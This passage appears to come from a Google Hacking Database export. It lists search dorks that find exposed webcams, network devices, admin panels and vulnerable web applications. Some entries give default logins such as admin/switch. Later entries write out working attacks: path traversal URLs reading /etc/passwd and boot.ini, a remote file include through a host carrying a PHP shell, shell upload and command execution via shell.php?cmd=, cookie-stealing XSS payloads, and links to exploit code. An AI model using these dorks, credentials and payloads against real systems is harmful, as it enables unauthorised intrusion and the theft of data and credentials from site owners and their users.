Web Installer page. On newer versions, after you install, Joomla asks you to delete the installation dir before it becomes functional.<br> <br> The Webinstaller gives an attacker information about the PHP configuration, and rgod has even found a way to inject data into the configuration.php file, resulting in a DoS attack (see the forums for more info).<br> <br> The admin logon can be found searching: intitle:"- Administration [Joomla]" but there are no default passwords.[descr]] [[url]http://www.google.com/search?q=intitle:%22Joomla+-+Web+Installer%22&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork]intitle:"Joomla - Web Installer"[dork]] [end][1660]] [[start][1661] [[title]intitle:"Webview Logon Page"[title]] [[descr]This is the web interface for Alcatel's Omniswitch. 
Default login is: admin/switch.[descr]] [[url]http://www.google.com/search?q=intitle:%22Webview+Logon+Page%22&filter=0[url]] [[dork]intitle:"Webview Logon Page"[dork]] [end][1661]] [[start][1662] [[title](intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")[[title]] [[descr]PRTG Traffic Grapher is Windows software for monitoring and classifying bandwidth usage. It provides system administrators with live readings and long-term usage trends for their network devices. The most common usage is bandwidth usage monitoring, but you can also monitor many other aspects of your network, like memory and CPU utilization.[descr]] [[url]http://www.google.com/search?num=50&q=%28intitle%3A%22PRTG+Traffic+Grapher%22+inurl%3A%22allsensors%22%29%7C%28intitle%3A%22PRTG+Traffic+Grapher+-+Monitoring+Results%22%29[url]] [[dork](intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")[dork]] [end][1662]] [[start][1663] [[title]intitle:"AR-*" "browser of frame dealing is necessary"[title]] [[descr]A few Sharp printers ..[descr]] [[url]http://www.google.com/search?q=intitle:%22AR-*%22+%22browser+of+frame+dealing+is+necessary%22&filter=0[url]] [[dork]intitle:"AR-*" "browser of frame dealing is necessary"[dork]] [end][1663]] [[start][1664] [[title]intitle:"WxGoos-" ("Camera image"|"60 seconds" )[[title]] [[descr]This is used in server rooms and such, where climate conditions are crucial to hardware health. If an attacker were to guess the password for the configuration page, then he could find POP3 passwords in plain text in the HTML source code.<br> <br> It runs on "I.T. Watchdogs, Inc. 
Embedded Web Server"[descr]] [[url]http://www.google.com/search?num=50&&q=intitle%3A%22WxGoos-%22+%28%22Camera+image%22%7C%2260+seconds%22+%29[url]] [[dork]intitle:"WxGoos-" ("Camera image"|"60 seconds" )[dork]] [end][1664]] [[start][1665] [[title]intext:"you to handle frequent configuration jobs easily and quickly" | intitle:"Show/Search other devices"[title]] [[descr]ELSA DSL LAN modems.[descr]] [[url]http://www.google.com/search?q=intext:%22you+to+handle+frequent+configuration+jobs+easily+and+quickly%22+%7C+intitle:%22Show/Search+other+devices%22&num=100&filter=0[url]] [[dork]intext:"you to handle frequent configuration jobs easily and quickly" | intitle:"Show/Search other devices"[dork]] [end][1665]] [[start][1666] [[title]intitle:"NAS" inurl:indexeng.html[[title]] [[descr]Disk Online Server NAS device.[descr]] [[url]http://www.google.com/search?q=intitle:%22NAS%22+inurl:indexeng.html&num=100&filter=0[url]] [[dork]intitle:"NAS" inurl:indexeng.html[dork]] [end][1666]] [[start][1667] [[title]"Thank You for using WPCeasy"[title]] [[descr]There is a SQL injection vulnerability in WPC.easy, resulting in full admin access for any remote attacker. Vendor was notified. 
<br> <br> http://www.securityfocus.com/archive/1/425395[descr]] [[url]http://www.google.com/search?q=%22Thank+You+for+using+WPCeasy%22&filter=0[url]] [[dork]"Thank You for using WPCeasy"[dork]] [end][1667]] [[start][1668] [[title]intitle:"Skystream Networks Edge Media Router" -securitytracker.com[[title]] [[descr]Skystream Networks Edge Media Router.[descr]] [[url]http://www.google.com/search?q=intitle:%22Skystream+Networks+Edge+Media+Router%22+-securitytracker.com&filter=0[url]] [[dork]intitle:"Skystream Networks Edge Media Router" -securitytracker.com[dork]] [end][1668]] [[start][1669] [[title]intitle:"Ethernet Network Attached Storage Utility"[title]] [[descr]Linksys network storage utility.[descr]] [[url]http://www.google.com/search?q=intitle:%22Ethernet+Network+Attached+Storage++Utility%22&num=100&filter=0[url]] [[dork]intitle:"Ethernet Network Attached Storage Utility"[dork]] [end][1669]] [[start][1670] [[title]intitle:"GigaDrive Utility"[title]] [[descr]Linksys GigaDrive network storage utility.[descr]] [[url]http://www.google.com/search?q=intitle:%22GigaDrive+Utility%22&num=50&filter=0[url]] [[dork]intitle:"GigaDrive Utility"[dork]] [end][1670]] [[start][1672] [[title]intitle:"LOGREP - Log file reporting system" -site:itefix.no[[title]] [[descr]Logrep is an open source log file Extraction and Reporting System by ITeF!x. This dork finds the logs that it creates.[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22LOGREP+-+Log+file+reporting+system%22+-site%3Aitefix.no&btnG=Google+Search[url]] [[dork]intitle:"LOGREP - Log file reporting system" -site:itefix.no[dork]] [end][1672]] [[start][1673] [[title]intitle:"HostMonitor log" | intitle:"HostMonitor report"[title]] [[descr]HostMonitor is a system management tool that continuously monitors servers' availability and performance. This dork finds logs created by HostMonitor. 
The logs aren't very exciting, but the control panel, in which you can run tests and change settings, can be found by searching for:<br> intitle:"HostMonitor: Web Interface".<br> There was only one result at the time of submitting though.<br> [descr]] [[url]http://www.google.com/search?q=intitle:%22HostMonitor+log%22+%7C+intitle:%22HostMonitor+report%22&num=100&hl=en&lr=&filter=0[url]] [[dork]intitle:"HostMonitor log" | intitle:"HostMonitor report"[dork]] [end][1673]] [[start][1674] [[title]inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com[[title]] [[descr]RemotelyAnywhere is a program that enables remote control, in the same manner as VNC. Once logged in, an attacker has almost complete control of the computer.[descr]] [[url]http://www.google.com/search?q=inurl:2000+intitle:RemotelyAnywhere+-site:realvnc.com&num=100&hl=en&lr=&filter=0[url]] [[dork]inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com[dork]] [end][1674]] [[start][1675] [[title]"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com[[title]] [[descr]This dork finds firewall/VPN products from Fiber Logic. They only require one-factor authentication.[descr]] [[url]http://www.google.com/search?q=%22Web-Based+Management%22+%22Please+input+password+to+login%22+-inurl:johnny.ihackstuff.com&num=100&hl=en&lr=&filter=0[url]] [[dork]"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com[dork]] [end][1675]] [[start][1676] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1676]] [[start][1677] [[title]inurl:client_execute.cgi[[title]] [[descr]This search finds network cameras and video servers from Cynix Inc. 
They can be a good source of amusement and an okay way to pass time when the cable's out.[descr]] [[url]http://www.google.com/search?q=inurl:client_execute.cgi&num=100&hl=en&lr=&filter=0[url]] [[dork]inurl:client_execute.cgi[dork]] [end][1677]] [[start][1678] [[title]intitle:"Edr1680 remote viewer"[title]] [[descr]This search finds the 1680 series digital video recorder from EverFocus.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial_s&q=intitle%3A%22Edr1680+remote+viewer%22&btnG=Search[url]] [[dork]intitle:"Edr1680 remote viewer"[dork]] [end][1678]] [[start][1679] [[title]"OK logout" inurl:vb.htm?logout=1[[title]] [[descr]This is a Google dork for Hunt Electronics web cams. To get to the cameras, remove the vb.htm?logout=1 from the URL.[descr]] [[url]http://www.google.com/search?q=%22OK+logout%22+inurl:vb.htm%3Flogout%3D1&num=100&hl=en&lr=&filter=0[url]] [[dork]"OK logout" inurl:vb.htm?logout=1[dork]] [end][1679]] [[start][1680] [[title]intitle:"DVR Client" -the -free -pdf -downloads -blog -download -dvrtop[[title]] [[descr]This dork finds the digital video recording client from Nuvico.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=intitle%3A%22DVR+Client%22+-the+-free+-pdf+-downloads+-blog+-download+-dvrtop&btnG=Search[url]] [[dork]intitle:"DVR Client" -the -free -pdf -downloads -blog -download -dvrtop[dork]] [end][1680]] [[start][1681] [[title]inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp -"Response.Buffer = True" -javascript[[title]] [[descr]Ecommerce Templates makes an online shopping cart solution. 
This search finds the admin login.[descr]] [[url]http://www.google.com/search?q=inurl:%22vsadmin/login%22+%7C+inurl:%22vsadmin/admin%22+inurl:.php%7C.asp++-%22Response.Buffer+%3D+True%22+-javascript&num=100&hl=en&lr=&safe=off&filter=0[url]] [[dork]inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp -"Response.Buffer = True" -javascript[dork]] [end][1681]] [[start][1682] [[title]intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman[[title]] [[descr]Webmail is an HTTP-based email server made by atmail.com. To get to the admin login instead of the regular login, add webadmin/ to the URL. [descr]] [[url]http://www.google.com/search?q=intitle:%22Login+to+%40Mail%22+(ext:pl+%7C+inurl:%22index%22)+-dwaffleman&num=100&hl=en&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official_s&filter=0[url]] [[dork]intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman[dork]] [end][1682]] [[start][1683] [[title]inurl:"calendarscript/users.txt"[title]] [[descr]CalendarScript is an overpriced online calendar system written in Perl. The passwords are encrypted using Perl's crypt() function, which I think DES encrypts things. However, if the computer the calendar script is on doesn't support the crypt function, they are plaintext. Changing calendar dates might not sound useful, but people reuse passwords, so who knows? 
<br> <br> <br> Also search for the logins:<br> intitle:"Calendar Administration : Login" | inurl:"calendar/admin/index.asp" -demo -demos<br> <br> Then to get the passwords change the url from<br> wxw.calendersiteexample.com/thissite/calendar_admin.cgi<br> to<br> wxw.calendersiteexample.com/thissite/calendarscript/users.txt <br> <br> The defaults are anonymous/anonymous and Administrator/Administrator.[descr]] [[url]http://www.google.com/search?q=inurl:%22calendarscript/users.txt%22&num=100&hl=en&lr=&filter=0[url]] [[dork]inurl:"calendarscript/users.txt"[dork]] [end][1683]] [[start][1684] [[title]intitle:"EZPartner" -netpond[[title]] [[descr]EZPartner is a great marketing tool that will help you increase your sales by sending webmaster affiliate traffic to your sites. This search finds the logins.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22EZPartner%22+-netpond&btnG=Search[url]] [[dork]intitle:"EZPartner" -netpond[dork]] [end][1684]] [[start][1685] [[title]"Powered by Loudblog"[title]] [[descr]this dork is for the LoudBlog <= 0.4 arbitrary remote inclusion vulnerability<br> <br> advisory & poc exploit:<br> <br> http://retrogod.altervista.org/loudblog_04_incl_xpl.html[descr]] [[url]http://www.google.com/search?hl=it&q=%22Powered+by+Loudblog%22+&btnG=Cerca+con+Google&meta=[url]] [[dork]"Powered by Loudblog" [dork]] [end][1685]] [[start][1686] [[title]"This website engine code is copyright" "2005 by Clever Copy" -inurl:demo[[title]] [[descr]Clever Copy <= 3.0 SQL injection <br> <br> dork: "This website engine code is copyright" "2005 by Clever Copy" <br> <br> advisory and poc exploit: <br> <br> http://retrogod.altervista.org/Clever_Copy_V3_sql_xpl.html[descr]] [[url]http://www.google.com/search?q=%22This+website+engine+code+is+copyright%22+%222005+by+Clever+Copy%22+-inurl:demo&hl=it&lr=&filter=0[url]] [[dork]"This website engine code is copyright" "2005 by Clever Copy" -inurl:demo[dork]] [end][1686]] [[start][1687] 
[[title]intitle:"b2evo installer" intext:"Installer für Version"[title]] [[descr]this page lets you know some interesting info on the target machine: database name, username... <br> it lets you see phpinfo() and, if you know the database password, lets you inject arbitrary code in blogs/conf/_config.php, regardless of magic_quotes_gpc settings, and launch commands <br> <br> wrote a simple dictionary attack tool for this: <br> <br> http://retrogod.altervista.org/b2evo_16alpha_bf.html[descr]] [[url]http://www.google.com/search?q=intitle:%22b2evo+installer%22+intext:%22Installer+f%C3%BCr+Version%22+&hl=it&lr=&start=0&sa=N&filter=0[url]] [[dork]intitle:"b2evo installer" intext:"Installer für Version" [dork]] [end][1687]] [[start][1691] [[title]inurl:fingerprint.jsp -CVS -Mailing intext:Servlet+Engine[[title]] [[descr]Fingerprint.jsp is an Axis sample file that often contains a wealth of information about the types of middleware components driving web services. This script has a propensity to give back massive amounts of diagnostic and configuration information when present.[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Afingerprint.jsp+-CVS+-Mailing+intext%3AServlet%2BEngine&btnG=Search[url]] [[dork]inurl:fingerprint.jsp -CVS -Mailing intext:Servlet+Engine[dork]] [end][1691]] [[start][1692] [[title]inurl:happyaxis.jsp -CVS -Mailing[[title]] [[descr]Happyaxis.jsp is an Axis server configuration file that seems to double-check the application server to see if it's web-services capable with all the right components installed. 
This file tends to give back a wealth of information that a site really shouldn't share with the world.[descr]] [[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Ahappyaxis.jsp+-CVS+-Mailing&btnG=Search[url]] [[dork]inurl:happyaxis.jsp -CVS -Mailing[dork]] [end][1692]] [[start][1693] [[title]"index of" intext:fckeditor inurl:fckeditor[[title]] [[descr]"index of" intext:fckeditor inurl:fckeditor <br> <br> this dork is for the FCKEditor script<br> <br> through the <br> editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious content on the target machine, including php code, and launch commands... <br> <br> however, if you do not succeed in executing the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them... <br> <br> this tool does the dirty work for 2.0 - 2.2 versions: <br> <br> http://retrogod.altervista.org/fckeditor_22_xpl.html[descr]] [[url]http://www.google.com/search?hl=it&q=%22index+of%22+intext%3Afckeditor+inurl%3Afckeditor+&btnG=Cerca+con+Google&meta=[url]] [[dork]"index of" intext:fckeditor inurl:fckeditor [dork]] [end][1693]] [[start][1694] [[title]"powered by runcms" -runcms.com -runcms.org[[title]] [[descr]"powered by runcms" -runcms.com -runcms.org <br> <br> all versions <=1.2 are vulnerable to an arbitrary remote inclusion, <br> this is more specific for the versions I tested: <br> <br> "powered by runcms (1.1)|(1.2)" -runcms.com -runcms.org <br> <br> however all versions <= 1.3a, through FCKEditor, let a user upload <br> a .php5, .php3 or .inc file <br> <br> see the exploits: <br> <br> http://retrogod.altervista.org/runcms_13a_xpl.html <br> http://retrogod.altervista.org/fckeditor_22_xpl.html[descr]] [[url]http://www.google.com/search?hl=it&q=%22powered+by+runcms%22+-runcms.com+-runcms.org+&btnG=Cerca&lr=[url]] [[dork]"powered by runcms" -runcms.com -runcms.org [dork]] [end][1694]] [[start][1695] [[title]("This Dragonfly™ installation was" | "Thanks for 
downloading Dragonfly") -inurl:demo -inurl:cpgnuke.com[[title]] [[descr]exploit and short explanation: <br> <br> http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html[descr]] [[url]http://www.google.com/search?q=(%22This+Dragonfly%E2%84%A2+installation+was%22+%7C+%22Thanks+for+downloading+Dragonfly%22)+-inurl:demo+-inurl:cpgnuke.com&hl=en&lr=&start=20&sa=N[url]] [[dork]("This Dragonfly™ installation was" | "Thanks for downloading Dragonfly") -inurl:demo -inurl:cpgnuke.com[dork]] [end][1695]] [[start][1696] [[title]inurl:docmgr | intitle:"DocMGR" "enter your Username and"|"und Passwort bitte"|"saisir votre nom"|"su nombre de usuario" -ext:pdf -inurl:"download.php"[[title]] [[descr]exploit and short explanation: <br> http://retrogod.altervista.org/docmgr_0542_incl_xpl.html[descr]] [[url]http://www.google.com/search?q=inurl:docmgr+%7C+intitle:%22DocMGR%22+%22enter+your+Username+and%22%7C%22und+Passwort+bitte%22%7C%22saisir+votre+nom%22%7C%22su+nombre+de+usuario%22+-ext:pdf+-inurl:%22download.php%22+&hl=en&lr=&filter=0[url]] [[dork]inurl:docmgr | intitle:"DocMGR" "enter your Username and"|"und Passwort bitte"|"saisir votre nom"|"su nombre de usuario" -ext:pdf -inurl:"download.php" [dork]] [end][1696]] [[start][1697] [[title](intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc[[title]] [[descr]exploiting a bug in EGS Enterprise Groupware System 1.0 rc4, I found this dork: <br> <br> (intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc <br> <br> It is related to the installation script of FileSpray 0.9.7, now I'm going to test 0.9.8-9 <br> <br> by now switch to the sql/ directory and search for the install-0.9.7.php script <br> <br> explanation link: <br> http://retrogod.altervista.org/egs_10rc4_php5_incl_xpl.html<br> exploit adjusted for flyspray: <br> <br> http://retrogod.altervista.org/flyspray_097_php5_incl_xpl.html[descr]] 
[[url]http://www.google.com/search?hl=en&q=%28intitle%3A%22Flyspray+setup%22%7C%22powered+by+flyspray+0.9.7%22%29+-flyspray.rocks.cc+&btnG=Cerca+con+Google&meta=[url]] [[dork](intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc [dork]] [end][1697]] [[start][1698] [[title]intext:"LinPHA Version" intext:"Have fun"[title]] [[descr]this is for Linpha <=1.0 arbitrary local inclusion:<br> <br> http://retrogod.altervista.org/linpha_10_local.html <br> <br> intext:"LinPHA Version" intext:"Have fun" <br> <br> to see the version in the description <br> <br> in the Linpha 0.9 branch there is also sql injection through cookies to bypass the admin login, search for the exploit[descr]] [[url]http://www.google.com/search?q=intext:%22LinPHA+Version%22+intext:%22Have+fun%22+&hl=en&lr=&start=20&sa=N[url]] [[dork]intext:"LinPHA Version" intext:"Have fun" [dork]] [end][1698]] [[start][1699] [[title]inurl:updown.php | intext:"Powered by PHP Uploader Downloader"[title]] [[descr]this (evil) script lets you upload a php shell on the target server, in most cases not password protected <br> <br> dork: <br> <br> inurl:updown.php | intext:"Powered by PHP Uploader Downloader" <br> <br> a note: sometimes you don't see a link to a list of uploaded files... 
just switch to <br> <br> http://[target]/[path]/updown.php?action=download[descr]] [[url]http://www.google.com/search?hl=it&q=inurl%3Aupdown.php+%7C+intext%3A%22Powered+by+PHP+Uploader+Downloader%22+&btnG=Cerca+con+Google&meta=&num=100[url]] [[dork]inurl:updown.php | intext:"Powered by PHP Uploader Downloader" [dork]] [end][1699]] [[start][1700] [[title]("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis[[title]] [[descr]dork: ("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis <br> <br> software: http://nocc.sourceforge.net/ <br> <br> this is for Nocc Webmail multiple arbitrary local inclusion, multiple xss & possible remote code execution <br> flaws I found: <br> <br> example of arbitrary local inclusion: <br> http://[target]/[path]/html/footer.php?cmd=dir&_SESSION[nocc_theme]=../../../../../../../../../test.php%00 <br> http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=../../../../../../../../../../../../etc/passwd%00 <br> http://[target]/[path]/index.php?lang=fr&theme=../../../../../../../../../../../../etc/passwd%00 <br> http://[target]/[path]/index.php?lang=../../../../../../../../../../../../test <br> <br> example of commands execution (including an uploaded mail attachment with php code inside, <br> filename is predictable...) 
<br> http://[target]/[path]/index.php?cmd=dir&lang=../tmp/php331.tmp1140514888.att%00 <br> <br> xss: <br> http://[target]/[path]/html/error.php?html_error_occurred=alert(document.cookie) <br> http://[target]/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie) <br> http://[target]/[path]/html/no_mail.php?html_no_mail=alert(document.cookie) <br> http://[target]/[path]/html/html_bottom_table.php?page_line=alert(document.cookie) <br> http://[target]/[path]/html/html_bottom_table.php?prev=alert(document.cookie) <br> http://[target]/[path]/html/html_bottom_table.php?next=alert(document.cookie) <br> http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=">alert(document.cookie) <br> <br> <br> full advisory & poc exploit: <br> <br> http://retrogod.altervista.org/noccw_10_incl_xpl.html[descr]] [[url]http://www.google.com/search?hl=en&q=%28%22powered+by+nocc%22+intitle%3A%22NOCC+Webmail%22%29+-site%3Asourceforge.net+-Zoekinalles.nl+-analysis+&meta=&num=100&filter=0[url]] [[dork]("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis [dork]] [end][1700]] [[start][1701] [[title]intitle:"igenus webmail login"[title]] [[descr]intitle:"igenus webmail login"<br> <br> example exploit: <br> <br> http://[target]/[path]/?Lang=../../../../../../../../../../etc/passwd%00 <br> http://[target]/[path]/config/config_inc.php?SG_HOME=../../../../../../../../../../etc/passwd%00 <br> <br> also, on php5: <br> http://[target]/[path]/config/config_inc.php?SG_HOME=ftp://username:passwor&#100;&#064;&#115;omehost.com&cmd=dir <br> <br> where on somehost.com you have a php shell code in a ".config" file <br> <br> exploit code: <br> http://retrogod.altervista.org/igenus_202_xpl_pl.html<br> [descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22igenus+webmail+login%22&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]] [[dork]intitle:"igenus webmail login"[dork]] [end][1701]] [[start][1702] [[title]allintitle:"FirstClass Login"[title]] 
[[descr]allintitle:"FirstClass Login" <br> <br> this is for firstclass directory listings<br> <br> go to http://[target]/[path]/Search <br> <br> <br> type just ' in the search field and you have a list of downloadable files; you don't see all files on the server, but you can search for a robots.txt with some folder paths or other info on the site structure; crawling in this way you have unauthorized access to all files on the target server[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=allintitle%3A%22FirstClass+Login%22+&filter=0[url]] [[dork]allintitle:"FirstClass Login" [dork]] [end][1702]] [[start][1703] [[title]"powered by 4images"[title]] [[descr]this is for 4images <= 1.7.1 remote code execution<br> (you can see the version in the google description)<br> <br> poc exploit: <br> <br> http://retrogod.altervista.org/4images_171_incl_xpl.html[descr]] [[url]http://www.google.com/search?q=%22powered+by+4images%22+&num=100&hl=en&lr=&start=100&sa=N&filter=0[url]] [[dork]"powered by 4images" [dork]] [end][1703]] [[start][1704] [[title]intext:"Powered By Geeklog" -geeklog.net[[title]] [[descr]dork: intext:"Powered By Geeklog" -geeklog.net <br> <br> this is for the vulnerability discovered by GulfTech research, related stuff: <br> <br> (*) http://www.gulftech.org/?node=research&article_id=00102-02192006 <br> http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=geeklog&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0 <br> <br> <br> exploit for (*) : <br> http://retrogod.altervista.org/geeklog_1_4_xpl_php_.html (php) <br> http://retrogod.altervista.org/geeklog_1_4_xpl_perl_.html (perl...mphhh)[descr]] [[url]http://www.google.com/search?hl=en&q=intext%3A%22Powered+By+Geeklog%22+-geeklog.net+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]] [[dork]intext:"Powered By Geeklog" -geeklog.net [dork]] [end][1704]] [[start][1705] [[title]intitle:admbook intitle:version filetype:php[[title]] [[descr]intitle:admbook intitle:version filetype:php <br> <br> tested 
version: 1.2.2, you can inject php code in config-data.php and execute commands on the target through the X-FORWARDED-FOR http header when you post a message <br> <br> also you can see phpinfo(): <br> <br> http://[target]/[path]/admin/info.php<br> <br> perl exploit:<br> http://retrogod.altervista.org/admbook_122_xpl.html[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3Aadmbook+intitle%3Aversion+filetype%3Aphp+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]] [[dork]intitle:admbook intitle:version filetype:php [dork]] [end][1705]] [[start][1706] [[title]WEBalbum 2004-2006 duda -ihackstuff -exploit[[title]] [[descr]dork: <br> WEBalbum 2004-2006 duda -ihackstuff -exploit<br> <br> software site: http://www.web-album.org/ <br> <br> advisory/ poc exploit: <br> http://retrogod.altervista.org/webalbum_202pl_local_xpl.html[descr]] [[url]http://www.google.com/search?q=WEBalbum+2004-2006+duda+-ihackstuff+-exploit&num=100&hl=en&lr=&start=200&sa=N&filter=0[url]] [[dork]WEBalbum 2004-2006 duda -ihackstuff -exploit[dork]] [end][1706]] [[start][1707] [[title]intext:"Powered by Plogger!" 
-plogger.org -ihackstuff -exploit[[title]] [[descr]explanation & exploit: <br> http://retrogod.altervista.org/plogger_b21_sql_xpl.html[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][1707]] [[start][1708] [[title]intext:"powered by gcards" -ihackstuff -exploit[[title]] [[descr]this is for gcards <=1.45 multiple vulnerabilities, advisory & poc exploit: <br> <br> http://retrogod.altervista.org/gcards_145_xpl.html[descr]] [[url]http://www.google.com/search?num=100&hl=it&q=intext%3A%22powered+by+gcards%22+-ihackstuff+-exploit&btnG=Cerca&lr=&filter=0[url]] [[dork]intext:"powered by gcards" -ihackstuff -exploit[dork]] [end][1708]] [[start][1709] [[title]"powered by php icalendar" -ihackstuff -exploit[[title]] [[descr]this is for <br> php iCalendar <= 2.21 "cookie_language"/"cookie_style" remote cmmdns xctn <br> & <br> php iCalendar <= 2.21 publish.ical.php remote cmmdns xctn <br> <br> exploits: <br> http://retrogod.altervista.org/phpical_221_incl_xpl.html <br> http://retrogod.altervista.org/phpical_221_put_xpl.html[descr]] [[url]http://www.google.com/search?q=%22powered+by+php+icalendar%22+-ihackstuff+-exploit&num=100&hl=en&lr=&start=100&sa=N&filter=0[url]] [[dork]"powered by php icalendar" -ihackstuff -exploit[dork]] [end][1709]] [[start][1710] [[title]"powered by guestbook script" -ihackstuff -exploit[[title]] [[descr]poc exploit & explanation: <br> http://retrogod.altervista.org/gbs_17_xpl_pl.html[descr]] [[url]http://www.google.com/search?num=100&hl=it&q=%22powered+by+guestbook+script%22+-ihackstuff+-exploit&lr=&filter=0[url]] [[dork]"powered by guestbook script" -ihackstuff -exploit[dork]] [end][1710]] [[start][1711] [[title]"Powered by XHP CMS" -ihackstuff -exploit -xhp.targetit.ro[[title]] [[descr]tested version: 0.5 <br> without having admin rights, you can go to: <br> http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/manager.php <br> or <br> http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/standalonemanager.php 
<br> to upload a shell with the usual code inside... <br> after: <br> http://[target]/[path]/filemanager/shell.php?cmd=ls%20-la <br> <br> tool: <br> http://retrogod.altervista.org/XHP_CMS_05_xpl.html[descr]] [[url]http://www.google.com/search?q=%22Powered+by+XHP+CMS%22+-ihackstuff+-exploit+-xhp.targetit.ro&num=100&hl=en&lr=&start=200&sa=N&filter=0[url]] [[dork]"Powered by XHP CMS" -ihackstuff -exploit -xhp.targetit.ro[dork]] [end][1711]] [[start][1712] [[title]inurl:"wrapper/index.php?file_wrap"[title]] [[descr]inurl:"wrapper/index.php?file_wrap" <br> <br> it reveals all files on the target system but only on win boxes, ex: <br> <br> http://[target]/[path]/wrapper/index.php?file_wrap=..\..\..\..\..\..\..\..\..\..\..\boot.ini <br> <br> <br> you cannot use "/" because it is filtered, the code is like this: <br> <br> [code]<br> if(strstr($file_wrap, "/") <br> || !(file_exists("pages/$file_wrap")) <br> || strstr($file_wrap, "%00")) <br> { echo "Désolé, page invalide !";} <br> else <br> { require_once("../wrapper/pages/$file_wrap"); } <br> [/code] <br> <br> just<br> http://[target]/[path]/wrapper/index.php?file_wrap=<br> <br> to list some files.<br> <br> tool to check this issue: <br> <br> http://retrogod.altervista.org/arti_303_xpl.html <br> <br> <br> [descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&q=inurl%3A%22wrapper%2Findex.php%3Ffile_wrap%22+[url]] [[dork]inurl:"wrapper/index.php?file_wrap" [dork]] [end][1712]] [[start][1713] [[title]inurl:*.exe ext:exe inurl:/*cgi*/[[title]] [[descr]cgi-bin executables xss/html injection miscellanea:<br> <br> some examples:<br> <br> inurl:keycgi.exe ext:exe inurl:/*cgi*/ <br> xss: <br> http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=">[XSS HERE] <br> <br> inurl:wa.exe ext:exe inurl:/*cgi*/ <br> xss: <br> http://[target]/[path]/cgi-bin/wa.exe?SUBED1=">[XSS HERE] <br> <br> inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ <br> xss: <br> 
http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=">[XSS HERE]&poi1city=city&poi1state=OK <br> <br> inurl:as_web.exe ext:exe inurl:/*cgi*/ <br> xss: <br> http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes <br> <br> inurl:webplus.exe ext:exe inurl:/*cgi*/ <br> xss: <br> http://[target]/[path]/cgi-bin/webplus.exe?script=">[XSS HERE] <br> <br> inurl:odb-get.exe ext:exe inurl:/*cgi*/ <br> xss: <br> http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=">[XSS HERE]&WIT_oid=what::what::1111&m=1&d= <br> <br> inurl:hcapstat.exe ext:exe inurl:/*cgi*/ <br> xss: <br> http://[target]/[path]/cgi-bin/hcapstat.exe?CID=">[XSS HERE]&GID=&START=110&SBN=OFF&ACTION=Submit <br> <br> inurl:webstat.exe ext:exe inurl:/*cgi*/ <br> xss: <br> http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=">[XSS HERE] <br> <br> inurl:cows.exe ext:exe inurl:/*cgi*/ <br> xss: <br> http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=">[XSS HERE] <br> <br> inurl:findifile.exe ext:exe inurl:/*cgi*/ <br> xss: <br> http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=">[XSS HERE]&LIMIT=50&YEAR="> <br> <br> inurl:baserun.exe ext:exe inurl:/*cgi*/ <br> xss: <br> http://[target]/[path]/cgi-bin/baserun.exe?_cfg=">[XSS HERE] <br> <br> inurl:Users.exe ext:exe inurl:/*cgi*/ <br> html injection: <br> http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html]<!--&ACTION=Profile&USERID=uid <br> <br> inurl:w.exe ext:exe inurl:/*cgi*/ <br> this script works like google translate page, can be used like a proxy, you do not see <br> images... 
